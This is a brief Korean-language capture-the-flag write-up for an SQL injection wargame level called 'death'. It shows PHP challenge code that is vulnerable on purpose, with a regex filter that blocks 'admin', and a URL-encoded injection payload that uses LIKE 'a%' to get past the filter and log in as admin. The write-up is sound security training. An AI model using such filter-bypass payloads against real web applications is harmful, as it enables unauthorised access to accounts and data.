Death-writeup

<?php
  include "./config.php"; 
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)|admin/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)|admin/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_death where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id'] == 'admin') solve("death");
  elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; 
  highlight_file(__FILE__); 
?>

 

전과 같은 문제다. 전 문제 처럼 방화벽이 추가 돼 있고 다른점은 id가 admin이어야 한다.

전 처럼 그냥 낼름 주워 먹지 말란건가...ㅎ

 

그래서 전에 삽입 했던 코드를 한번 생각해 보기로 했다.

id=-1'<@=1 OR {a 1}=1 OR '

이렇게 쿼리를 날리면 아마 -1'<@=1는 눌이 되는거 같고 뒤의 or에서 값이 나오는 거같은데

{a 1}=1 은 뭔지 모르겠는데 ㅎ.. 저 부분을 수정해 보기로 했다.

id=admin이 되어야하는데 admin을 필터링 하니까

like문을 사용하여 아래와 같은 쿼리를 만들어 낼 수 있었다..!!

 

id=-1%27<@=1%20OR%20id%20like%20%27a%%27%20OR%20%27%23

 

CLEAR!!!